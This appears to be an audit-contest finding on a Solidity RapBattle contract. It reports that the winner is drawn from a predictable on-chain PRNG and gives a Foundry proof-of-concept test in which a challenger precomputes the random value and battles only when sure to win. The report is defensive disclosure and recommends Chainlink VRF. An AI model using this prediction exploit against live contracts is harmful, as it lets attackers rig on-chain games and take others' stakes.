Submission Details
Severity:
Weak PRNG being used to determine the winner allows the challenger to win every time
Summary
Using weak PRNG allows the challenger to predict the outcome of the battle.
Vulnerability Details
Since the winner is decided using a random number that is generated using values like block.timestamp, and block.prevrandao, the challenger is able to precompute the same number and predict if they're going to win the battle or not. If they do, they'll go ahead and call the RapBattle::goOnStageOrBattle function otherwise they won't.
Impact
Allows the challenger to manipulate battle outcomes.
POC
uint wins;
event Log(uint);
function testOnlyChallengerWillWin(uint number) external twoSkilledRappers {
// approving the RapBattle
vm.startPrank(user);
oneShot.approve(address(rapBattle), 0);
cred.approve(address(rapBattle), 4);
vm.stopPrank();
vm.startPrank(challenger);
cred.approve(address(rapBattle), 4);
vm.stopPrank();
// defender goes on stage
vm.startPrank(user);
rapBattle.goOnStageOrBattle(0, 4);
vm.stopPrank();
// challenger predicts the outcome and battles only when he wins
vm.startPrank(challenger);
uint256 defenderRapperSkill = rapBattle.getRapperSkill(0);
uint256 random =
uint256(keccak256(abi.encodePacked(block.timestamp, block.prevrandao, challenger))) % (defenderRapperSkill+rapBattle.getRapperSkill(1));
if(random > defenderRapperSkill) {
rapBattle.goOnStageOrBattle(1, 4);
wins++;
assert(cred.balanceOf(challenger) == 8);
}
emit Log(wins);
}
Tools Used
Foundry
Recommendations
Use ChainLink VRF to generate random numbers.
Rewards breakdown
nSLOC
201This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.